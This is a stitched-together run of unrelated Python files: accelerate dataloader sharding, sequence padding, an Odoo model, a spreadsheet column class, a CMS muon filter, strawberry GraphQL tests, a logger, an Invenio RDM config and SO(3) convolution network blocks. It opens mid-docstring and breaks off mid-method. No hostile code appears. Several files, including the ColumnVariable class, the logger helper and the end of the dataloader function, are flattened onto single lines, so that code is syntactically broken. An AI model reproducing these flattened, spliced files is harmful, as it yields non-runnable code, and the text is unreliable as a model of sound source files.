    iteration at the first batch that would be too small / not present on all processes or loop with indices from the
    beginning.

    Args:
        dataloader (:obj:`torch.utils.data.dataloader.DataLoader`):
            The data loader to split across several devices.
        device (:obj:`torch.device`):
            The target device for the returned :obj:`DataLoader`.
        num_processes (:obj:`int`, `optional`):
            The number of processes running concurrently. Will default to the value given by
            :class:`~accelerate.AcceleratorState`.
        process_index (:obj:`int`, `optional`):
            The index of the current process. Will default to the value given by
            :class:`~accelerate.AcceleratorState`.
        split_batches (:obj:`bool`, `optional`, defaults to :obj:`False`):
            Whether the resulting :obj:`DataLoader` should split the batches of the original data loader across devices
            or yield full batches (in which case it will yield batches starting at the :obj:`process_index`-th and
            advancing of :obj:`num_processes` batches at each iteration).

            Another way to see this is that the observed batch size will be the same as the initial :obj:`dataloader`
            if this option is set to :obj:`True`, the batch size of the initial :obj:`dataloader` multiplied by
            :obj:`num_processes` otherwise.

            Setting this option to :obj:`True` requires that the batch size of the :obj:`dataloader` is a round
            multiple of :obj:`batch_size`.
        put_on_device (:obj:`bool`, `optional`, defaults to :obj:`False`):
            Whether or not to put the batches on :obj:`device` (only works if the batches are nested list, tuples or
            dictionaries of tensors).

    Returns:
        :obj:`torch.utils.data.dataloader.DataLoader`: A new data loader that will yield the portion of the batches

    .. warning::

        This does not support :obj:`BatchSampler` with varying batch size yet.
    """
    # Grab defaults from AcceleratorState
    state = AcceleratorState()
    if num_processes is None:
        num_processes = state.num_processes
    if process_index is None:
        process_index = state.process_index

    # Sanity check
    if split_batches and dataloader.batch_size % num_processes != 0:
        raise ValueError(
            f"Using `split_batches=True` requires that the batch size ({dataloader.batch_size}) "
            f"to be a round multiple of the number of processes ({num_processes})."
        )

    new_dataset = dataloader.dataset
    new_batch_sampler = dataloader.batch_sampler
    # No change if no multiprocess
    if num_processes != 1:
        if isinstance(new_dataset, IterableDataset):
            new_dataset = IterableDatasetShard(
                new_dataset,
                batch_size=dataloader.batch_size,
                drop_last=dataloader.drop_last,
                num_processes=num_processes,
                process_index=process_index,
                split_batches=split_batches,
            )
        else:
            # New batch sampler for the current process.
new_batch_sampler = BatchSamplerShard( dataloader.batch_sampler, num_processes=num_processes, process_index=process_index, split_batches=split_batches, ) # We ignore all of those since they are all dealt with by our new_batch_sampler ignore_kwargs = [ "batch_size", "shuffle", "sampler", "batch_sampler", "drop_last", ] kwargs = { k: getattr(dataloader, k, _PYTORCH_DATALOADER_KWARGS[k]) for k in _PYTORCH_DATALOADER_KWARGS if k not in ignore_kwargs } return DataLoaderShard( new_dataset, device=device if put_on_device else None, batch_sampler=new_batch_sampler, **kwargs, )
# coding: utf-8
# 2021/7/12 @ tongshiwei

__all__ = ["PadSequence", "pad_sequence"]


class PadSequence(object):
    """Pad or clip a sequence to a fixed length.

    Sequences shorter than ``length`` are right-padded with ``pad_val``;
    if ``clip`` is True, sequences longer than ``length`` are truncated.

    Parameters
    ----------
    length : int
        The maximum length to pad/clip the sequence
    pad_val : number
        The pad value. Default 0
    clip : bool
    """

    def __init__(self, length, pad_val=0, clip=True):
        self._length = length
        self._pad_val = pad_val
        self._clip = clip

    def __call__(self, sample: list):
        """Return *sample* padded/clipped to the configured length.

        Parameters
        ----------
        sample : list of number

        Returns
        -------
        ret : list of number
        """
        missing = self._length - len(sample)
        if missing > 0:
            # Too short: extend with the pad value.
            return sample + [self._pad_val] * missing
        if missing < 0 and self._clip:
            # Too long and clipping enabled: truncate.
            return sample[:self._length]
        # Exact length, or too long with clipping disabled: leave untouched.
        return sample


def pad_sequence(sequence: list, max_length=None, pad_val=0, clip=True):
    """Pad every sequence in *sequence* to a common length.

    Parameters
    ----------
    sequence
    max_length
    pad_val
    clip

    Returns
    -------

    Examples
    --------
    >>> seq = [[4, 3, 3], [2], [3, 3, 2]]
    >>> pad_sequence(seq)
    [[4, 3, 3], [2, 0, 0], [3, 3, 2]]
    >>> pad_sequence(seq, pad_val=1)
    [[4, 3, 3], [2, 1, 1], [3, 3, 2]]
    >>> pad_sequence(seq, max_length=2)
    [[4, 3], [2, 0], [3, 3]]
    >>> pad_sequence(seq, max_length=2, clip=False)
    [[4, 3, 3], [2, 0], [3, 3, 2]]
    """
    # Default target length: the longest sequence in the batch.
    target = max(len(seq) for seq in sequence) if max_length is None else max_length
    padder = PadSequence(target, pad_val=pad_val, clip=clip)
    return [padder(seq) for seq in sequence]
# -*- coding: utf-8 -*-

from odoo import models, fields, api, _


class AmazonProduct(models.Model):
    """Product record imported/scraped from Amazon (name, image and link URLs)."""

    _name = "amazon.product"
    # Fix: Odoo logs a "model has no _description" warning for every model
    # that defines _name without _description.
    _description = "Amazon Product"

    name = fields.Char('Product Name')            # product title as shown on Amazon
    img_url = fields.Char(string="Image URL")     # URL of the product image
    link_url = fields.Char(string="Link URL")     # URL of the product page
""" Abstracts a column to handle its existence as both part of a Table and a namespace variable. A ColumnVariable has a lifetime no longer than the period that the underlying column is static. """ import api_util import cell_types class ColumnVariable(object): """ Manages the relationship between the data in a Column and a namespace variable with the same name. This is done in the context of formula evaluation, especially iterative evaluation of formulas. The ColumnVariable assumes that the underlying table is not updated. If the underlying table is to be updated: 1. use setColumnValue() to update the column from the namespace variable 2. Make the table modifications 3. Create a new ColumnVariable. """ def __init__(self, column): """ :param Column column: """ self._column = column self._baseline_value = self.getColumnValue() self._setNamespaceValue() self._iteration_start_value = self.getNamespaceValue() def getNamespaceValue(self): # TODO: This won't work with nested columns - consider namespaces root = self._column.getRoot(is_attached=False) return root.getNamespace()[self._column.getName(is_global_name=False)] def getColumn(self): return self._column def getName(self): return self._column.getName(is_global_name=False) def getColumnValue(self): return self._column.getCells() # TODO: All names have global scope. Provide hierarchical scopes. def _setNamespaceValue(self): """ Establishes the value of the variable in the namespace. """ table = self._column.getRoot(is_attached=False) # TODO: This won't work with nested columns - consider namespaces table.getNamespace()[self._column.getName(is_global_name=False)] = \ api_util.coerceValuesForColumn(self._column, self.getColumnValue()) def setColumnValue(self): """ Establishes the value of the variable in the Column. Called if the column is changed outside the namespace during formula evaluation. 
:param object value: """ self._column.addCells(self.getNamespaceValue(), replace=True) def setIterationStartValue(self): """ Establishes the value of the variable in the namespace at the start of an iteration in formula evaluation. """ self._iteration_start_value = self.getNamespaceValue() def isNamespaceValueEquivalentToBaselineValue(self): """ Checks if the value of the variable in the namespace has changed from its baselineline value. :return bool: True if changed """ return cell_types.isEquivalentData(self.getNamespaceValue(), self._baseline_value) def isNamespaceValueEquivalentToIterationStartValue(self): """ Checks if the value of the variable in the namespace has changed from its iteration start value :return bool: True if changed """ return cell_types.isEquivalentData(self.getNamespaceValue(), self._iteration_start_value)
import FWCore.ParameterSet.Config as cms

# EDFilter tagging "bad" global muons in miniAOD; in filter mode (taggingMode
# False) the event is rejected when such a muon is found.
badGlobalMuonTaggerMAOD = cms.EDFilter("BadGlobalMuonTagger",
    muons = cms.InputTag("slimmedMuons"),
    vtx = cms.InputTag("offlineSlimmedPrimaryVertices"),
    muonPtCut = cms.double(20),           # consider only muons above 20 GeV
    selectClones = cms.bool(False),       # this instance targets bad (not clone) muons
    taggingMode = cms.bool(False),        # False -> acts as an event filter
)

# Same module configured to select duplicate ("clone") global muons instead.
cloneGlobalMuonTaggerMAOD = badGlobalMuonTaggerMAOD.clone(
    selectClones = True
)

# Veto sequence: keep events failing both taggers (i.e. with no clone and no
# bad global muons); "~" negates each filter's decision.
noBadGlobalMuonsMAOD = cms.Sequence(~cloneGlobalMuonTaggerMAOD + ~badGlobalMuonTaggerMAOD)
from strawberry.subscriptions import GRAPHQL_TRANSPORT_WS_PROTOCOL, GRAPHQL_WS_PROTOCOL

from .app import create_app


def _assert_subprotocol_rejected(ws, data):
    """Assert the server refused the websocket handshake.

    Expected behavior: no subprotocol negotiated, connection closed with
    code 4406 and reason "Subprotocol not acceptable".
    """
    assert ws.protocol is None
    assert ws.closed
    assert ws.close_code == 4406
    assert data.extra == "Subprotocol not acceptable"


async def test_graphiql_view(aiohttp_app_client):
    """GraphiQL page is served for HTML requests when enabled (default)."""
    response = await aiohttp_app_client.get("/graphql", headers={"Accept": "text/html"})
    body = await response.text()

    assert "GraphiQL" in body


async def test_graphiql_disabled_view(aiohttp_client):
    """The HTML view 404s when GraphiQL is disabled."""
    app = create_app(graphiql=False)
    client = await aiohttp_client(app)
    response = await client.get("/graphql", headers={"Accept": "text/html"})

    assert response.status == 404


async def test_turning_off_graphql_ws(aiohttp_client):
    """graphql-ws clients are rejected when only graphql-transport-ws is enabled."""
    app = create_app(subscription_protocols=[GRAPHQL_TRANSPORT_WS_PROTOCOL])
    aiohttp_app_client = await aiohttp_client(app)

    async with aiohttp_app_client.ws_connect(
        "/graphql", protocols=[GRAPHQL_WS_PROTOCOL]
    ) as ws:
        data = await ws.receive(timeout=2)
        _assert_subprotocol_rejected(ws, data)


async def test_turning_off_graphql_transport_ws(aiohttp_client):
    """graphql-transport-ws clients are rejected when only graphql-ws is enabled."""
    app = create_app(subscription_protocols=[GRAPHQL_WS_PROTOCOL])
    aiohttp_app_client = await aiohttp_client(app)

    async with aiohttp_app_client.ws_connect(
        "/graphql", protocols=[GRAPHQL_TRANSPORT_WS_PROTOCOL]
    ) as ws:
        data = await ws.receive(timeout=2)
        _assert_subprotocol_rejected(ws, data)


async def test_turning_off_all_ws_protocols(aiohttp_client):
    """Every subscription protocol is rejected when none are enabled."""
    app = create_app(subscription_protocols=[])
    aiohttp_app_client = await aiohttp_client(app)

    async with aiohttp_app_client.ws_connect(
        "/graphql", protocols=[GRAPHQL_TRANSPORT_WS_PROTOCOL]
    ) as ws:
        data = await ws.receive(timeout=2)
        _assert_subprotocol_rejected(ws, data)

    async with aiohttp_app_client.ws_connect(
        "/graphql", protocols=[GRAPHQL_WS_PROTOCOL]
    ) as ws:
        data = await ws.receive(timeout=2)
        _assert_subprotocol_rejected(ws, data)


async def test_unsupported_ws_protocol(aiohttp_client):
    """Unknown subprotocols are rejected."""
    app = create_app(subscription_protocols=[])
    aiohttp_app_client = await aiohttp_client(app)

    async with aiohttp_app_client.ws_connect(
        "/graphql", protocols=["imaginary-protocol"]
    ) as ws:
        data = await ws.receive(timeout=2)
        _assert_subprotocol_rejected(ws, data)


async def test_clients_can_prefer_protocols(aiohttp_client):
    """When both protocols are enabled, the client's first preference wins."""
    app = create_app(
        subscription_protocols=[GRAPHQL_WS_PROTOCOL, GRAPHQL_TRANSPORT_WS_PROTOCOL]
    )
    aiohttp_app_client = await aiohttp_client(app)

    async with aiohttp_app_client.ws_connect(
        "/graphql", protocols=[GRAPHQL_TRANSPORT_WS_PROTOCOL, GRAPHQL_WS_PROTOCOL]
    ) as ws:
        assert ws.protocol == GRAPHQL_TRANSPORT_WS_PROTOCOL

    async with aiohttp_app_client.ws_connect(
        "/graphql", protocols=[GRAPHQL_WS_PROTOCOL, GRAPHQL_TRANSPORT_WS_PROTOCOL]
    ) as ws:
        assert ws.protocol == GRAPHQL_WS_PROTOCOL
""" Standard logger settings """ import logging LOG_FORMAT = "%(asctime)s - %(name)s - %(levelname)s - %(message)s" def get_logger(name, level=logging.DEBUG): logger = logging.getLogger(name) logger.setLevel(level) # create console handler and set level to debug console_handler = logging.StreamHandler() console_handler.setLevel(level) formatter = logging.Formatter(LOG_FORMAT) console_handler.setFormatter(formatter) logger.addHandler(console_handler) return logger
# -*- coding: utf-8 -*-

import calendar


class Mbrmau:
    """Builds a message listing the workdays (Mon-Fri) of a given month."""

    def __init__(self, year, month):
        """Compute the 'Y/M/D' strings for all weekdays of *year*/*month*.

        Replaces the previous chain of one-shot map/filter iterators with a
        single comprehension (same result, less fragile under Python 3).
        """
        first_weekday, last_day = calendar.monthrange(year, month)
        self.__workdays = [
            '%d/%d/%d' % (year, month, day)
            for day in range(1, last_day + 1)
            # calendar weekday numbering: 0=Monday .. 6=Sunday; keep Mon-Fri.
            if (first_weekday + day - 1) % 7 < 5
        ]

    def message(self):
        """Render the workday list through the package's message template.

        Returns:
            str: The rendered message.
        """
        # Imported lazily so the class stays constructible (and testable)
        # in environments without jinja2 installed.
        from jinja2 import Environment, PackageLoader

        pl = PackageLoader('mbrmau', './', encoding='utf8')
        env = Environment(loader=pl)
        tpl = env.get_template('message.tpl')
        tpl_variables = {
            "days": self.__workdays
        }
        message = tpl.render(tpl_variables)
        return message


if __name__ == '__main__':
    print(Mbrmau(2016, 12).message())
# -*- coding: utf-8 -*-
#
# Copyright (C) 2019 CERN.
# Copyright (C) 2019 Northwestern University.
# Copyright (C) 2021 Graz University of Technology.
#
# Invenio-RDM-Records is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.

"""DataCite-based data model for Invenio."""

import idutils

from .services import facets


def _(x):
    """Identity function for string extraction."""
    return x


# Files REST

# FILES_REST_PERMISSION_FACTORY = record_files_permission_factory
"""Set default files permission factory."""

# Invenio-RDM-Records
# ===================

RDM_RECORDS_METADATA_NAMESPACES = {}
"""Namespaces for fields *added* to the metadata schema.

Of the shape:

.. code-block:: python

    {
        '<prefix1>': {
            '@context': '<url>'
        },
        # ...
        '<prefixN>': {
            '@context': '<url>'
        }
    }

For example:

.. code-block:: python

    {
        'dwc': {
            '@context': 'http://rs.tdwg.org/dwc/terms/'
        },
        'z':{
            '@context': 'https://zenodo.org/terms'
        }
    }

Use :const:`invenio_rdm_records.config.RDM_RECORDS_METADATA_EXTENSIONS` to
define the added fields.

See :class:`invenio_rdm_records.services.schemas.\
metadata_extensions.MetadataExtensions` for how this configuration variable
is used.
"""

RDM_RECORDS_METADATA_EXTENSIONS = {}
"""Fields added to the metadata schema.

Of the shape:

.. code-block:: python

    {
        '<prefix1>:<field1>': {
            'elasticsearch': '<allowed elasticsearch type>'
            'marshmallow': '<allowed marshmallow type>'
        },
        # ...
        '<prefixN>:<fieldN>': {
            'elasticsearch': '<allowed elasticsearch type>'
            'marshmallow': '<allowed marshmallow type>'
        }
    }

For example:

.. code-block:: python

    {
        'dwc:family': {
            'elasticsearch': 'keyword',
            'marshmallow': SanitizedUnicode()
        },
        'dwc:behavior': {
            'elasticsearch': 'text',
            'marshmallow': SanitizedUnicode()
        },
        'z:department': {
            'elasticsearch': 'text',
            'marshmallow': SanitizedUnicode()
        }
    }

Use :const:`invenio_rdm_records.config.RDM_RECORDS_METADATA_NAMESPACES` to
define the prefixes.

See :class:`invenio_rdm_records.services.schemas.\
metadata_extensions.MetadataExtensions` for allowed types and how this
configuration variable is used.
"""

RDM_RECORDS_USER_FIXTURE_PASSWORDS = {
    "admin@inveniosoftware.org": None
}
"""Overrides for the user fixtures' passwords.

The password set for a user fixture in this dictionary overrides the
password set in the ``users.yaml`` file. This can be used to set custom
passwords for the fixture users (of course, this has to be configured
before the fixtures are installed, e.g. by setting up the services).
If ``None`` or an empty string is configured in this dictionary, then the
password from ``users.yaml`` will be used. If that is also absent, a password
will be generated randomly.
"""

RDM_RECORDS_UI_EDIT_URL = "/uploads/<pid_value>"
"""Default UI URL for the edit page of a Bibliographic Record."""

#: Default site URL (used only when not in a context - e.g. like celery tasks).
THEME_SITEURL = "http://127.0.0.1:5000"

#: DataCite DOI credentials
RDM_RECORDS_DOI_DATACITE_ENABLED = True
RDM_RECORDS_DOI_DATACITE_USERNAME = ""
RDM_RECORDS_DOI_DATACITE_PASSWORD = ""
RDM_RECORDS_DOI_DATACITE_PREFIX = "10.1234"
RDM_RECORDS_DOI_DATACITE_TEST_MODE = True
RDM_RECORDS_DOI_DATACITE_FORMAT = "{prefix}/{id}"


# PID Schemes

def always_valid(identifier):
    """Gives every identifier as valid."""
    return True


# Validators come from the ``idutils`` library; labels are marked for
# translation via the identity ``_``.
RDM_RECORDS_RECORD_PID_SCHEMES = {
    "doi": {
        "label": _("DOI"),
        "validator": idutils.is_doi
    },
    "oai": {
        "label": _("OAI"),
        "validator": always_valid
    }
}

RDM_RECORDS_PERSONORG_SCHEMES = {
    "orcid": {
        "label": _("ORCID"),
        "validator": idutils.is_orcid,
        "datacite": "ORCID"
    },
    "isni": {
        "label": _("ISNI"),
        "validator": idutils.is_isni,
        "datacite": "ISNI"
    },
    "gnd": {
        "label": _("GND"),
        "validator": idutils.is_gnd,
        "datacite": "GND"
    },
    "ror": {
        "label": _("ROR"),
        "validator": idutils.is_ror,
        "datacite": "ROR"
    },
}

RDM_RECORDS_IDENTIFIERS_SCHEMES = {
    "ark": {
        "label": _("ARK"),
        "validator": idutils.is_ark,
        "datacite": "ARK"
    },
    "arxiv": {
        "label": _("arXiv"),
        "validator": idutils.is_arxiv,
        "datacite": "arXiv"
    },
    "bibcode": {
        "label": _("Bibcode"),
        "validator": idutils.is_ads,
        "datacite": "bibcode"
    },
    "doi": {
        "label": _("DOI"),
        "validator": idutils.is_doi,
        "datacite": "DOI"
    },
    "ean13": {
        "label": _("EAN13"),
        "validator": idutils.is_ean13,
        "datacite": "EAN13"
    },
    "eissn": {
        "label": _("EISSN"),
        "validator": idutils.is_issn,
        "datacite": "EISSN"
    },
    "handle": {
        "label": _("Handle"),
        "validator": idutils.is_handle,
        "datacite": "Handle"
    },
    "igsn": {
        "label": _("IGSN"),
        "validator": always_valid,
        "datacite": "IGSN"
    },
    "isbn": {
        "label": _("ISBN"),
        "validator": idutils.is_isbn,
        "datacite": "ISBN"
    },
    "issn": {
        "label": _("ISSN"),
        "validator": idutils.is_issn,
        "datacite": "ISSN"
    },
    "istc": {
        "label": _("ISTC"),
        "validator": idutils.is_istc,
        "datacite": "ISTC"
    },
    "lissn": {
        "label": _("LISSN"),
        "validator": idutils.is_issn,
        "datacite": "LISSN"
    },
    "lsid": {
        "label": _("LSID"),
        "validator": idutils.is_lsid,
        "datacite": "LSID"
    },
    "pmid": {
        "label": _("PMID"),
        "validator": idutils.is_pmid,
        "datacite": "PMID"
    },
    "purl": {
        "label": _("PURL"),
        "validator": idutils.is_purl,
        "datacite": "PURL"
    },
    "upc": {
        "label": _("UPC"),
        "validator": always_valid,
        "datacite": "UPC"
    },
    "url": {
        "label": _("URL"),
        "validator": idutils.is_url,
        "datacite": "URL"
    },
    "urn": {
        "label": _("URN"),
        "validator": idutils.is_urn,
        "datacite": "URN"
    },
    "w3id": {
        "label": _("W3ID"),
        "validator": always_valid,
        "datacite": "w3id"
    },
}
"""These are used for main, alternate and related identifiers."""

RDM_RECORDS_REFERENCES_SCHEMES = {
    "isni": {
        "label": _("ISNI"),
        "validator": idutils.is_isni
    },
    "grid": {
        "label": _("GRID"),
        "validator": always_valid
    },
    "crossreffunderid": {
        "label": _("Crossref Funder ID"),
        "validator": always_valid
    },
    "other": {
        "label": _("Other"),
        "validator": always_valid
    }
}

RDM_RECORDS_LOCATION_SCHEMES = {
    "wikidata": {
        "label": _("Wikidata"),
        "validator": always_valid
    },
    "geonames": {
        "label": _("GeoNames"),
        "validator": always_valid
    }
}


#
# Record permission policy
#
RDM_PERMISSION_POLICY = None
"""Override the default record permission policy."""


#
# Search configuration
#
RDM_FACETS = {
    'access_status': {
        'facet': facets.access_status,
        'ui': {
            'field': 'access.status',
        }
    },
    'is_published': {
        'facet': facets.is_published,
        'ui': {
            'field': 'is_published',
        }
    },
    'language': {
        'facet': facets.language,
        'ui': {
            'field': 'languages',
        }
    },
    'resource_type': {
        'facet': facets.resource_type,
        'ui': {
            'field': 'resource_type.type',
            'childAgg': {
                'field': 'resource_type.subtype',
            }
        }
    },
    'subject': {
        'facet': facets.subject,
        'ui': {
            'field': 'subjects.subject',
        }
    },
    'subject_nested': {
        'facet': facets.subject_nested,
        'ui': {
            'field': 'subjects.scheme',
            'childAgg': {
                'field': 'subjects.subject',
            }
        }
    },
}

RDM_SORT_OPTIONS = {
    "bestmatch": dict(
        title=_('Best match'),
        fields=['_score'],  # ES defaults to desc on `_score` field
    ),
    "newest": dict(
        title=_('Newest'),
        fields=['-created'],
    ),
    "oldest": dict(
        title=_('Oldest'),
        fields=['created'],
    ),
    "version": dict(
        title=_('Version'),
        fields=['-versions.index'],
    ),
    "updated-desc": dict(
        title=_('Recently updated'),
        fields=['-updated'],
    ),
    "updated-asc": dict(
        title=_('Least recently updated'),
        fields=['updated'],
    ),
}
"""Definitions of available record sort options.

.. code-block:

    "<option name>": dict(
        title=_('<title>'),
        fields=['-updated'],
    ),
"""

RDM_SEARCH = {
    'facets': ['access_status', 'resource_type'],
    'sort': ['bestmatch', 'newest', 'oldest', 'version']
}
"""Record search configuration.

The configuration has two possible keys:

- ``facets`` - A list of facet names which must have been defined in
  ``RDM_FACETS``.
- ``sort`` -  A list of sort option names which must have been defined in
  ``RDM_SORT_OPTIONS``.
- ``sort_default`` - The default sort option when a query is provided. Must be
  a single sort option name which must have been defined in
  ``RDM_SORT_OPTIONS``. If not provided, will use the first element of
  the ``sort`` list.
- ``sort_default_no_query`` - The default sort option when no query is
  provided. Must be a single sort option name which must have been defined in
  ``RDM_SORT_OPTIONS``. If not provided, will use the second element of
  the ``sort`` list.
"""

RDM_SEARCH_DRAFTS = {
    'facets': ['access_status', 'is_published', 'resource_type'],
    'sort': ['bestmatch', 'updated-desc', 'updated-asc', 'newest', 'oldest',
             'version'],
}
"""User records search configuration (i.e. list of uploads)."""

RDM_SEARCH_VERSIONING = {
    'facets': [],
    'sort': ['version'],
    'sort_default': 'version',
    'sort_default_no_query': 'version',
}
"""Records versions search configuration (list of versions for a record)."""
import math
import os
import numpy as np
import time
from collections import namedtuple
import scipy.io as sio
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.modules.batchnorm import _BatchNorm

# import vgtk.zpconv as zptk
import vgtk.so3conv as sptk


# SO3 Conv
# [nb, np, 3] -> [nb, 3, np] x [nb, 1, np, na]
def preprocess_input(x, na, add_center=True):
    # x presumably holds xyz (+ optional normals) per point: [nb, np, 3 or 6]
    # — TODO confirm against callers.
    has_normals = x.shape[2] == 6
    # add a dummy center point at index zero
    if add_center and not has_normals:
        center = x.mean(1, keepdim=True)
        x = torch.cat((center,x),dim=1)[:,:-1]
    xyz = x[:,:,:3]
    return sptk.SphericalPointCloud(xyz.permute(0,2,1).contiguous(), sptk.get_occupancy_features(x, na, add_center), None)


# [b, c1, p, a] -> [b, c1, k, p, a] -> [b, c2, p, a]
class IntraSO3ConvBlock(nn.Module):
    """Intra-anchor SO(3) convolution followed by norm / activation / dropout."""

    def __init__(self, dim_in, dim_out, norm=None, activation='relu', dropout_rate=0):
        super(IntraSO3ConvBlock, self).__init__()
        if norm is None:
            norm = nn.InstanceNorm2d

        self.conv = sptk.IntraSO3Conv(dim_in, dim_out)
        self.norm = norm(dim_out, affine=False)
        if activation is None:
            self.relu = None
        else:
            # Resolve the activation by name from torch.nn.functional.
            self.relu = getattr(F, activation)
        self.dropout = nn.Dropout(dropout_rate) if dropout_rate > 0 else None

    def forward(self, x):
        # [b, 3, p] x [b, c1, p]
        x = self.conv(x)
        feat = self.norm(x.feats)
        if self.relu is not None:
            feat = self.relu(feat)
        if self.training and self.dropout is not None:
            feat = self.dropout(feat)
        # [b, 3, p] x [b, c2, p]
        return sptk.SphericalPointCloud(x.xyz, feat, x.anchors)


class PropagationBlock(nn.Module):
    """Kernel propagation from a fragment onto point clouds, with norm/act/dropout."""

    def __init__(self, params, norm=None, activation='relu', dropout_rate=0):
        super(PropagationBlock, self).__init__()
        self.prop = sptk.KernelPropagation(**params)
        if norm is None:
            norm = nn.InstanceNorm2d #nn.BatchNorm2d
        if activation is None:
            self.relu = None
        else:
            self.relu = getattr(F, activation)
        self.norm = norm(params['dim_out'], affine=False)
        self.dropout = nn.Dropout(dropout_rate) if dropout_rate > 0 else None

    def forward(self, frag, clouds):
        x = self.prop(frag, clouds)
        feat = self.norm(x.feats)
        if self.relu is not None:
            feat = self.relu(feat)
        if self.training and self.dropout is not None:
            feat = self.dropout(feat)
        return sptk.SphericalPointCloud(x.xyz, feat, x.anchors)


# [b, c1, p1, a] -> [b, c1, k, p2, a] -> [b, c2, p2, a]
class InterSO3ConvBlock(nn.Module):
    """Inter-point SO(3) convolution (possibly strided/subsampling) + norm/act/dropout."""

    def __init__(self, dim_in, dim_out, kernel_size, stride,
                 radius, sigma, n_neighbor, multiplier, kanchor=60,
                 lazy_sample=None, norm=None, activation='relu', pooling='none', dropout_rate=0):
        super(InterSO3ConvBlock, self).__init__()
        if lazy_sample is None:
            lazy_sample = True
        if norm is None:
            norm = nn.InstanceNorm2d #nn.BatchNorm2d
        pooling_method = None if pooling == 'none' else pooling

        self.conv = sptk.InterSO3Conv(dim_in, dim_out, kernel_size, stride,
                                      radius, sigma, n_neighbor, kanchor=kanchor,
                                      lazy_sample=lazy_sample, pooling=pooling_method)
        self.norm = norm(dim_out, affine=False)
        if activation is None:
            self.relu = None
        else:
            self.relu = getattr(F, activation)
        self.dropout = nn.Dropout(dropout_rate) if dropout_rate > 0 else None

    def forward(self, x, inter_idx=None, inter_w=None):
        # inter_idx / inter_w can be reused across calls to avoid recomputing
        # neighborhood indices and weights.
        inter_idx, inter_w, sample_idx, x = self.conv(x, inter_idx, inter_w)
        # import ipdb; ipdb.set_trace()
        feat = self.norm(x.feats)
        if self.relu is not None:
            feat = self.relu(feat)
        ## TODO no need to add self.training
        if self.training and self.dropout is not None:
            feat = self.dropout(feat)
        return inter_idx, inter_w, sample_idx, sptk.SphericalPointCloud(x.xyz, feat, x.anchors)


class BasicSO3ConvBlock(nn.Module):
    """Sequence of intra/inter/separable SO(3) conv blocks built from a param list."""

    def __init__(self, params):
        super(BasicSO3ConvBlock, self).__init__()

        self.blocks = nn.ModuleList()
        self.layer_types = []
        for param in params:
            if param['type'] == 'intra_block':
                conv = IntraSO3ConvBlock(**param['args'])
            elif param['type'] == 'inter_block':
                conv = InterSO3ConvBlock(**param['args'])
            elif param['type'] == 'separable_block':
                conv = SeparableSO3ConvBlock(param['args'])
            else:
                raise ValueError(f'No such type of SO3Conv {param["type"]}')
            self.layer_types.append(param['type'])
            self.blocks.append(conv)
        self.params = params

    def forward(self, x):
        inter_idx, inter_w = None, None
        for conv, param in zip(self.blocks, self.params):
            if param['type'] in ['inter', 'inter_block', 'separable_block']:
                inter_idx, inter_w, _, x = conv(x, inter_idx, inter_w)
                # import ipdb; ipdb.set_trace()
                # A strided layer changes the point set, so cached neighbor
                # indices/weights are invalidated.
                if param['args']['stride'] > 1:
                    inter_idx, inter_w = None, None
            elif param['type'] in ['intra_block']:
                # Intra Convolution
                x = conv(x)
            else:
                raise ValueError(f'No such type of SO3Conv {param["type"]}')

        return x

    def get_anchor(self):
        return torch.from_numpy(sptk.get_anchors())


class SeparableSO3ConvBlock(nn.Module):
    """Inter + (optional) intra SO(3) conv with a 1x1-conv skip connection."""

    def __init__(self, params):
        super(SeparableSO3ConvBlock, self).__init__()

        dim_in = params['dim_in']
        dim_out = params['dim_out']

        self.use_intra = params['kanchor'] > 1
        self.inter_conv = InterSO3ConvBlock(**params)

        intra_args = {
            'dim_in': dim_out,
            'dim_out': dim_out,
            'dropout_rate': params['dropout_rate'],
            'activation': params['activation'],
        }

        if self.use_intra:
            self.intra_conv = IntraSO3ConvBlock(**intra_args)
        self.stride = params['stride']

        # 1x1 conv for skip connection
        self.skip_conv = nn.Conv2d(dim_in, dim_out, 1)
        self.norm = nn.InstanceNorm2d(dim_out, affine=False)
        self.relu = getattr(F, params['activation'])

    def forward(self, x, inter_idx, inter_w):
        '''
        inter, intra conv with skip connection
        '''
        skip_feature = x.feats
        inter_idx, inter_w, sample_idx, x = self.inter_conv(x, inter_idx, inter_w)

        if self.use_intra:
            x = self.intra_conv(x)
        if self.stride > 1:
            # Subsampled: gather the skip features of the surviving points.
            skip_feature = sptk.functional.batched_index_select(skip_feature, 2, sample_idx.long())
        skip_feature = self.skip_conv(skip_feature)
        skip_feature = self.relu(self.norm(skip_feature))
        x_out = sptk.SphericalPointCloud(x.xyz, x.feats + skip_feature, x.anchors)

        return inter_idx, inter_w, sample_idx, x_out

    def get_anchor(self):
        return torch.from_numpy(sptk.get_anchors())


class ClsOutBlockR(nn.Module):
    """Classification head: 1x1 convs, optional intra convs, anchor pooling, FC layers."""

    def __init__(self, params, norm=None):
        super(ClsOutBlockR, self).__init__()

        c_in = params['dim_in']
        mlp = params['mlp']
        fc = params['fc']
        k = params['k']

        self.outDim = k

        self.linear = nn.ModuleList()
        self.norm = nn.ModuleList()

        # ------------------ uniary conv ----------------
        for c in mlp:
            self.linear.append(nn.Conv2d(c_in, c, 1))
            self.norm.append(nn.BatchNorm2d(c))
            c_in = c
        # -----------------------------------------------

        # ------------------ intra conv -----------------
        if 'intra' in params.keys():
            self.intra = nn.ModuleList()
            self.skipconv = nn.ModuleList()
            for intraparams in params['intra']:
                conv = IntraSO3ConvBlock(**intraparams['args'])
                self.intra.append(conv)
                c_out = intraparams['args']['dim_out']

                # for skip convs
                self.skipconv.append(nn.Conv2d(c_in, c_out, 1))
                self.norm.append(nn.BatchNorm2d(c_out))
                c_in = c_out
        # -----------------------------------------------

        # ----------------- pooling ---------------------
        if 'pooling' not in params.keys():
            self.pooling_method = 'max'
        else:
            self.pooling_method = params['pooling']
        # BxCxA -> Bx1xA or BxCxA attention weights
        if self.pooling_method == 'attention':
            self.temperature = params['temperature']
            self.attention_layer = nn.Conv1d(c_in, 1, 1)
        elif self.pooling_method == 'attention2':
            self.temperature = params['temperature']
            self.attention_layer = nn.Conv1d(c_in, c_in, 1)
        # ------------------------------------------------

        self.fc1 = nn.ModuleList()
        for c in fc:
            self.fc1.append(nn.Linear(c_in, c))
            # self.norm.append(nn.BatchNorm1d(c))
            c_in = c

        self.fc2 = nn.Linear(c_in, self.outDim)

    def forward(self, feats, label=None):
        x_out = feats

        norm_cnt = 0
        end = len(self.linear)
        for lid, linear in enumerate(self.linear):
            norm = self.norm[norm_cnt]
            x_out = linear(x_out)
